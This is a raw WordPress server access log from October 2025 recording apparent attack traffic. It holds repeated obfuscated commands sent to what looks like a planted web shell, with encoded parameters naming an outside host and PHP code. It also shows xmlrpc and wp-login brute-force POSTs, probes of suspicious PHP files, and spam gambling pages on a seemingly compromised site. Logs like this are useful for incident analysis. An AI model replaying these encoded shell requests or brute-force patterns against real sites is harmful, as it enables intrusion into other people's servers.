142.4.205.1 - - [15/Oct/2025:10:31:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323236302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383636302q3530333364663134373434656566333737373538633932623730653732313365222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.138.172 - - [15/Oct/2025:10:32:11 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/pattern HTTP/1.0" 200 7045 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.81.2.86 - - [15/Oct/2025:10:32:16 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MANMJS; rv:11.0) like Gecko"
51.81.2.86 - - [15/Oct/2025:10:32:17 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MANMJS; rv:11.0) like Gecko"
51.81.2.86 - - [15/Oct/2025:10:32:18 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MANMJS; rv:11.0) like Gecko"
142.4.205.1 - - [15/Oct/2025:10:31:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323238302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383638302q3334656238343162393864366263666462393833383632643234613432663338222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:31:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323330302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383730302q3465373161306636333238363961636337653432643031323562616632663139222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:32:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323332302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383732302q3331336161643863666265326333313737633838616439633731383862646166222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:32:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323334302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383734302q6239323733356363313563643732363936346436666339663862353365376461222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.136.5 - - [15/Oct/2025:10:33:24 -0400] "GET /2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2024/04 HTTP/1.0" 200 6767 "https://academiedumarketing.com/2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2024" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:10:32:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323336302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383736302q3562343336653463313064313339613161313330326231623233393233363731222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:33:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323338302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383738302q3963343965336431636239643164656439666537666339653664383566643363222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:33:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323430302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383830302q3230393434333763366462643033636266306263383338613864343564656135222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:33:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323432302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383832302q3962623934633631353936646633323635313235633234656461643434653833222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.128.196 - - [15/Oct/2025:10:34:53 -0400] "GET /2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2024/01 HTTP/1.0" 200 6768 "https://academiedumarketing.com/2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2024" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:10:34:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323434302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383834302q6337633562393339656132663564643061313963393131643232353037666535222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
196.251.83.229 - - [15/Oct/2025:10:35:01 -0400] "POST /wp-login.php HTTP/1.0" 200 93392 "-" "Mozilla/5.0"
196.251.83.229 - - [15/Oct/2025:10:35:01 -0400] "POST /wp-login.php HTTP/1.0" 200 93392 "-" "Mozilla/5.0"
196.251.83.229 - - [15/Oct/2025:10:35:01 -0400] "POST /wp-login.php HTTP/1.0" 200 93392 "-" "Mozilla/5.0"
66.249.66.71 - - [15/Oct/2025:10:35:15 -0400] "GET /?_g=1222843 HTTP/1.0" 200 23938 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:10:34:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323436302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383836302q3761313039323131663461613335636338323731656364353833343462323665222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:34:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323438302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383838302q6130623365613139646661653133326162626465653639326137643632613337222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:35:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323530302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383930302q6661643830333165346564306238616235356336663364333733626461396536222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [15/Oct/2025:10:36:12 -0400] "GET /2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2021/10 HTTP/1.0" 200 6769 "https://academiedumarketing.com/2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2021" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:10:35:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323532302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383932302q3664346364356361343932633938653064373935323030373562623735393963222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:35:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323534302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383934302q6361366362646431636638636566646562646139613236656233396330623939222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:36:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323536302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383936302q3035313533373932393032333831633433383664386236373064613932633130222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:36:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323538302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533383938302q3764306162373334646663373337376636643639353561653766306264353761222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.66.71 - - [15/Oct/2025:10:37:29 -0400] "GET /?_g=2327642 HTTP/1.0" 200 25131 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.70 - - [15/Oct/2025:10:37:33 -0400] "GET /?_g=1878250 HTTP/1.0" 200 24407 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.128.196 - - [15/Oct/2025:10:37:38 -0400] "GET /2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/plugins/akismet/views HTTP/1.0" 200 7562 "https://academiedumarketing.com/2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/plugins/akismet" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:10:36:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323630302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393030302q6364366436306137613734613639366339386535613130613765356261666335222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:37:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323632302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393032302q3561613438633330376330353264646131356439663466313332623830373963222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:37:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323634302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393034302q6631366537343735383164376362626130363832346365326537333632363633222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:37:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323636302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393036302q3762653332383261353662626564666431323434323534666339663163653936222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.66.72 - - [15/Oct/2025:10:38:48 -0400] "GET /?_g=1293033 HTTP/1.0" 200 24474 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.138.172 - - [15/Oct/2025:10:38:58 -0400] "GET /2019/09/06/hello-world?path=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk HTTP/1.0" 200 7176 "https://academiedumarketing.com/2019/09/06/hello-world" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:10:38:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323638302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393038302q6532313239613934623037306461663139323732396434666437373131396561222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.66.71 - - [15/Oct/2025:10:39:00 -0400] "GET /?_g=1427305 HTTP/1.0" 200 26071 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:10:38:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323730302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393130302q3038653431623533393230323262366162393936613237656538316636346163222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:38:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323732302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393132302q6539626262643962376262366538306134643465646635343236646334643163222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:39:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323734302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393134302q3637353736393664393536646263363937376538643665616430323136383538222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.66.72 - - [15/Oct/2025:10:40:07 -0400] "GET /?_g=77554 HTTP/1.0" 200 24478 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:10:39:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323736302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393136302q6462623737653631333433343933663766343433303835626139613866633035222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.136.5 - - [15/Oct/2025:10:40:20 -0400] "GET /2025/10/?path=/var/www/vhosts HTTP/1.0" 200 6690 "https://academiedumarketing.com/2025/10/?path=/var/www/vhosts/academiedumarketing.com/public_html/njABawTk" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.66.71 - - [15/Oct/2025:10:40:21 -0400] "GET /?_g=2443751 HTTP/1.0" 200 25097 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.227.253.15 - - [15/Oct/2025:10:40:20 -0400] "GET //postnews.php?ARRAY=7o2230223n313736303534333036332p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q78696164616r5s72616r645s7061746826743q313736303533393436332q6438386263656139643435626635303963313736663936663231636636343434222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 4519 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4183.83 Safari/537.36"
142.4.205.1 - - [15/Oct/2025:10:39:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323738302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393138302q6638643566663162386462396239636531653766643262393361643837356265222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [15/Oct/2025:10:40:57 -0400] "GET /wp-content/xf8aaa4/index.php HTTP/1.0" 503 5078 "https://academiedumarketing.com/wp-content/xf8aaa4/index.php" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/10.04 Chromium/15.0.874.106 Chrome/15.0.874.106 Safari/535.2"
204.12.208.18 - - [15/Oct/2025:10:40:58 -0400] "GET /wp-content/xf8aaa4/index.php HTTP/1.0" 503 5078 "https://academiedumarketing.com/wp-content/xf8aaa4/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7"
204.12.208.18 - - [15/Oct/2025:10:40:58 -0400] "GET /wp-content/xf8aaa4/index.php HTTP/1.0" 503 5078 "https://academiedumarketing.com/wp-content/xf8aaa4/index.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAGW; .NET4.0C; Lunascape 6.5.8.24780)"
142.4.205.1 - - [15/Oct/2025:10:40:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323830302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393230302q3030653837366536633334376463646363306536316464353137623132303130222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:40:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323832302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393232302q3864623337326165653331623335343834396566633264373263376130323033222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
167.71.166.141 - - [15/Oct/2025:10:41:22 -0400] "GET /xmlrpc.php HTTP/1.0" 200 9014 "http://academiedumarketing.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0"
142.4.205.1 - - [15/Oct/2025:10:40:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323834302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393234302q3534666631383830363862633230636139386437613038636464373564636137222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.136.5 - - [15/Oct/2025:10:41:47 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/search HTTP/1.0" 200 7588 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.66.71 - - [15/Oct/2025:10:41:50 -0400] "GET /zhHant/product/surugaya/A2108526702?campaign_uid=f64d716db5e979ed2f947dbaf4296895b951ae7f HTTP/1.0" 200 25590 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:10:41:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323836302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393236302q6363656131656531383234363932336664613164333539376639343463316336222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
